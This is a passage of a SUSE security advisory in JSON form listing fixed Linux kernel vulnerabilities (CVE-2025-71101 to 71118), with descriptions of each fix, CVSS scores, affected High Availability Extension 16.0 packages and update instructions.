"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71101"
},
{
"cve": "CVE-2025-71108",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71108"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: Handle incorrect num_connectors capability\n\nThe UCSI spec states that the num_connectors field is 7 bits, and the\n8th bit is reserved and should be set to zero.\nSome buggy FW has been known to set this bit, and it can lead to a\nsystem not booting.\nFlag that the FW is not behaving correctly, and auto-fix the value\nso that the system boots correctly.\n\nFound on Lenovo P1 G8 during Linux enablement program. The FW will\nbe fixed, but seemed worth addressing in case it hit platforms that\naren\u0027t officially Linux supported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71108",
"url": "https://www.suse.com/security/cve/CVE-2025-71108"
},
{
"category": "external",
"summary": "SUSE Bug 1256774 for CVE-2025-71108",
"url": "https://bugzilla.suse.com/1256774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71108"
},
{
"cve": "CVE-2025-71111",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71111"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (w83791d) Convert macros to functions to avoid TOCTOU\n\nThe macro FAN_FROM_REG evaluates its arguments multiple times. When used\nin lockless contexts involving shared driver data, this leads to\nTime-of-Check to Time-of-Use (TOCTOU) race conditions, potentially\ncausing divide-by-zero errors.\n\nConvert the macro to a static function. This guarantees that arguments\nare evaluated only once (pass-by-value), preventing the race\nconditions.\n\nAdditionally, in store_fan_div, move the calculation of the minimum\nlimit inside the update lock. This ensures that the read-modify-write\nsequence operates on consistent data.\n\nAdhere to the principle of minimal changes by only converting macros\nthat evaluate arguments multiple times and are used in lockless\ncontexts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71111",
"url": "https://www.suse.com/security/cve/CVE-2025-71111"
},
{
"category": "external",
"summary": "SUSE Bug 1256728 for CVE-2025-71111",
"url": "https://bugzilla.suse.com/1256728"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71111"
},
{
"cve": "CVE-2025-71112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: add VLAN id validation before using\n\nCurrently, the VLAN id may be used without validation when\nreceive a VLAN configuration mailbox from VF. The length of\nvlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause\nout-of-bounds memory access once the VLAN id is bigger than\nor equal to VLAN_N_VID.\n\nTherefore, VLAN id needs to be checked to ensure it is within\nthe range of VLAN_N_VID.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71112",
"url": "https://www.suse.com/security/cve/CVE-2025-71112"
},
{
"category": "external",
"summary": "SUSE Bug 1256726 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "external",
"summary": "SUSE Bug 1256727 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256727"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2025-71112"
},
{
"cve": "CVE-2025-71113",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71113"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - zero initialize memory allocated via sock_kmalloc\n\nSeveral crypto user API contexts and requests allocated with\nsock_kmalloc() were left uninitialized, relying on callers to\nset fields explicitly. This resulted in the use of uninitialized\ndata in certain error paths or when new fields are added in the\nfuture.\n\nThe ACVP patches also contain two user-space interface files:\nalgif_kpp.c and algif_akcipher.c. These too rely on proper\ninitialization of their context structures.\n\nA particular issue has been observed with the newly added\n\u0027inflight\u0027 variable introduced in af_alg_ctx by commit:\n\n 67b164a871af (\"crypto: af_alg - Disallow multiple in-flight AIO requests\")\n\nBecause the context is not memset to zero after allocation,\nthe inflight variable has contained garbage values. As a result,\naf_alg_alloc_areq() has incorrectly returned -EBUSY randomly when\nthe garbage value was interpreted as true:\n\n https://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209\n\nThe check directly tests ctx-\u003einflight without explicitly\ncomparing against true/false. Since inflight is only ever set to\ntrue or false later, an uninitialized value has triggered\n-EBUSY failures. Zero-initializing memory allocated with\nsock_kmalloc() ensures inflight and other fields start in a known\nstate, removing random issues caused by uninitialized data.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71113",
"url": "https://www.suse.com/security/cve/CVE-2025-71113"
},
{
"category": "external",
"summary": "SUSE Bug 1256716 for CVE-2025-71113",
"url": "https://bugzilla.suse.com/1256716"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71113"
},
{
"cve": "CVE-2025-71114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71114"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvia_wdt: fix critical boot hang due to unnamed resource allocation\n\nThe VIA watchdog driver uses allocate_resource() to reserve a MMIO\nregion for the watchdog control register. However, the allocated\nresource was not given a name, which causes the kernel resource tree\nto contain an entry marked as \"\u003cBAD\u003e\" under /proc/iomem on x86\nplatforms.\n\nDuring boot, this unnamed resource can lead to a critical hang because\nsubsequent resource lookups and conflict checks fail to handle the\ninvalid entry properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71114",
"url": "https://www.suse.com/security/cve/CVE-2025-71114"
},
{
"category": "external",
"summary": "SUSE Bug 1256752 for CVE-2025-71114",
"url": "https://bugzilla.suse.com/1256752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71114"
},
{
"cve": "CVE-2025-71116",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71116"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make decode_pool() more resilient against corrupted osdmaps\n\nIf the osdmap is (maliciously) corrupted such that the encoded length\nof ceph_pg_pool envelope is less than what is expected for a particular\nencoding version, out-of-bounds reads may ensue because the only bounds\ncheck that is there is based on that length value.\n\nThis patch adds explicit bounds checks for each field that is decoded\nor skipped.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71116",
"url": "https://www.suse.com/security/cve/CVE-2025-71116"
},
{
"category": "external",
"summary": "SUSE Bug 1256744 for CVE-2025-71116",
"url": "https://bugzilla.suse.com/1256744"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71116"
},
{
"cve": "CVE-2025-71118",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71118"
}
],
"notes": [
{
"category": "general",
